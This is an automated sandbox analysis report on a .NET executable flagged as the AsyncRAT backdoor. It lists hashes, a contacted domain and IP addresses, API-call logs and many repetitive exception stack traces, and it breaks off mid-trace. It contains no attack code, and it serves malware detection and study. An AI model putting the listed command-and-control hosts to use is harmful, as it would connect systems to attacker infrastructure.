Summary | ZeroBOX

ddd.exe

Generic Malware UPX MPRESS Malicious Library PE64 PE File OS Processor Check PE32 .NET EXE
Category Machine Started Completed
FILE s1_win7_x6401 April 12, 2022, 5:24 p.m. April 12, 2022, 5:28 p.m.
Size 3.8MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 bcaaf37e0beb6717d01b175e6bc78c44
SHA256 c8da163b0c84637e8e40fb15add10d77ef3853af773f88bec56ff5a03c40e5ad
CRC32 46DE339C
ssdeep 6144:HaM42OlP2GhNTi2BsCx1wsWO34xrxafUA5VyNmMpHXrvObETLiEAmg+f:Q2iNTbnWvrxasAWEsyb1EAmDf
PDB Path C:\Users\Alexx\Desktop\vsCODE\Hardwareid\obj\Debug\QuickSetDNS.pdb
Yara
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • Is_DotNET_EXE - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature

Name Response Post-Analysis Lookup
xxx01xzb.beget.tech 91.106.207.25
IP Address Status Action
107.189.6.214 Active Moloch
164.124.101.2 Active Moloch
91.106.207.25 Active Moloch
5.188.119.76 Active Moloch

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000004ca310
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000004ca310
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000004ca2a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000004ca2a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000004ca230
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000004ca230
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path C:\Users\Alexx\Desktop\vsCODE\Hardwareid\obj\Debug\QuickSetDNS.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
